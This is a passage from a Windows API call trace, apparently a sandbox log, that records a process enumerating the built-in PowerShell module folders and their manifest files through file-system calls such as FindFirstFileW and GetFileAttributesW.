"c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautils.psd1")) returned 0x20 [0226.325] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.325] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security", lpFilePart=0x0) returned 0x50 [0226.325] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\", lpFilePart=0x0) returned 0x51 [0226.325] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.326] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.326] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x296, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security.psd1", cAlternateFileName="")) returned 1 [0226.326] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x296, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security.psd1", cAlternateFileName="")) returned 0 [0226.326] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.326] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.326] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.326] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.326] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security", lpFilePart=0x0) returned 0x50 [0226.326] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\", lpFilePart=0x0) returned 0x51 [0226.327] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.327] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.327] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x296, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security.psd1", cAlternateFileName="")) returned 1 [0226.327] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.327] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.327] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.327] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.327] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x105, lpBuffer=0x1b7fe100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security", lpFilePart=0x0) returned 0x50 [0226.327] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe540) returned 1 [0226.327] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe620 | out: lpFileInformation=0x1b7fe620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0226.328] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe500) returned 1 [0226.328] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe570) returned 1 [0226.328] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x105, lpBuffer=0x1b7fe060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security", lpFilePart=0x0) returned 0x50 [0226.328] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\", lpFilePart=0x0) returned 0x51 [0226.328] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.328] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.328] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x296, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security.psd1", cAlternateFileName="")) returned 1 [0226.328] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x296, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security.psd1", cAlternateFileName="")) returned 0 [0226.328] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.328] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.329] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe480) returned 1 [0226.329] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security\\microsoft.powershell.security.psd1")) returned 0x20 [0226.329] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.329] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0226.329] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\", lpFilePart=0x0) returned 0x50 [0226.329] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.329] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.329] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psd1", cAlternateFileName="")) returned 1 [0226.330] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 1 [0226.330] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 0 [0226.330] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.330] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.330] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.330] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.330] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0226.330] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\", lpFilePart=0x0) returned 0x50 [0226.330] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.330] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.331] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psd1", cAlternateFileName="")) returned 1 [0226.331] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 1 [0226.331] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.331] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.331] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.331] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.331] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x105, lpBuffer=0x1b7fe100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0226.331] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe540) returned 1 [0226.331] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe620 | out: lpFileInformation=0x1b7fe620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0226.331] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe500) returned 1 [0226.331] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe570) returned 1 [0226.331] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x105, lpBuffer=0x1b7fe060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0226.332] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\", lpFilePart=0x0) returned 0x50 [0226.332] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf910 [0226.439] FindNextFileW (in: hFindFile=0x1a5cf910, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.439] FindNextFileW (in: hFindFile=0x1a5cf910, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psd1", cAlternateFileName="")) returned 1 [0226.439] FindNextFileW (in: hFindFile=0x1a5cf910, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 1 [0226.440] FindNextFileW (in: hFindFile=0x1a5cf910, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 0 [0226.440] FindClose (in: hFindFile=0x1a5cf910 | out: hFindFile=0x1a5cf910) returned 1 [0226.440] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.440] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe480) returned 1 [0226.440] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0226.440] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.440] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management", lpFilePart=0x0) returned 0x4d [0226.440] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\", lpFilePart=0x0) returned 0x4e [0226.441] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.441] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, 